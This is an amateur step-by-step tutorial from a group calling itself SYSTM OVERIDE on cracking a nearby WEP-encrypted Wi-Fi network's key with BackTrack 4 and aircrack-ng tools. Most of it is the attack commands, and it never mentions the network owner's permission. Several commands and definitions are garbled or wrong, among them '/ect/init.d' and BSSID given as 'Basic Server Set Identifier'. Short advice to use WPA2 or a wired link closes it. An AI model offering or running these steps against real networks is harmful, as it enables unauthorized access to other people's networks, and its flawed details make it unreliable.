SYSTM OVERIDE

How To Hack A Wireless Connection

Using Backtrack 4 Final

Upsides and Downsides to Wireless Connections

Upsides Downsides
-No Cords Less Secure Than Wired
-No Plugs
-Not Location Specific

Glossary
Word Definition
WEP Wired Equivalent Privacy
BSSID Basic Server Set Identifier
ESSID Extended Server Set Identifier
WPA WiFi Protected Access

1. Download Back Track 4 Final’s .iso from http://www.backtrack-

linux.org
2. When The .iso has downloaded burn it to disk using a program
such as image burn from http://www.imageburn.com
3. Put the disk into a Computer with a wireless card and restart
the computer so that it boots from disk
4. Let it run until a command screen (it has text moving up and
down, when it stops you are ready) and type in startx, This
Starts the Interface.
5. Go down to the task bar and click on the command console
icon to launch the console
This is a product of SYSTM OVERIDE You May NOT copy this around but can show them to our
website for these tutorials.
 SYSTM OVERIDE
6. Type /ect/init.d/networking start
7. Then Type airmon-ng, and find out what your wireless card is
named.
8. The Type airmon-ng stop (your wireless card’s name)
9. Then Type airmon-ng start (your wirless card’s name) to start
your wireless card in monitor mode
10. Then Type airmon-ng, to save the changes
11. Now we need to scan wireless signals, to get the BSSID’s.
To do this type in airodump-ng (your wireless card’s name)
12. Then see which ones have WEP Encryption and write
down their BSSID, ESSID and Channel
13. Now press CTRL C, to stop
14. Now Type airodump-ng –w wep –c (Channel Number) --
bssid (BSSID Number) (your wireless card’s name), this will link
your wireless card to that connection
15. Open up a new console and type aireplay-ng –i o –a
(BSSID Number) (your wireless card’s name), this will associate
your wireless card with the connection so it can transmit data
16. Open up another console and type aireplay-ng -3 –b
(BSSID Number) (your wireless card’s name), this will start
sending and receiving data packets on the wireless connection
17. Now bring up the first console and watch the data column
until it reaches 30,000 or greater, this will take about one hour
or so
18. Once it has reached 30,000 bring up the console sending
and receiving data packets, Press CTRL C to stop it sending the
packets
19. Now type dir, this will give you a view of the root
directory. We are looking for a file that ends in .cap as this will
have the wireless key.

This is a product of SYSTM OVERIDE You May NOT copy this around but can show them to our
website for these tutorials.
 SYSTM OVERIDE
20. Once located type aircrack-ng (filename.cap), and it will
give you the wireless key.

Final Notes
 Most WEP connections can be hacked within 2 hours
 Use WPA or WPA2 for a more secure connection
 For an even more secure connection use a physical connection
like a CAT5 (Ethernet)

Well Done on hacking a wireless connection using backtrack 4 final

edition.

Please Watch our other tutorials and read our other Tutorials and
Blogs.

Thanks,

Zak

This is a product of SYSTM OVERIDE You May NOT copy this around but can show them to our
website for these tutorials.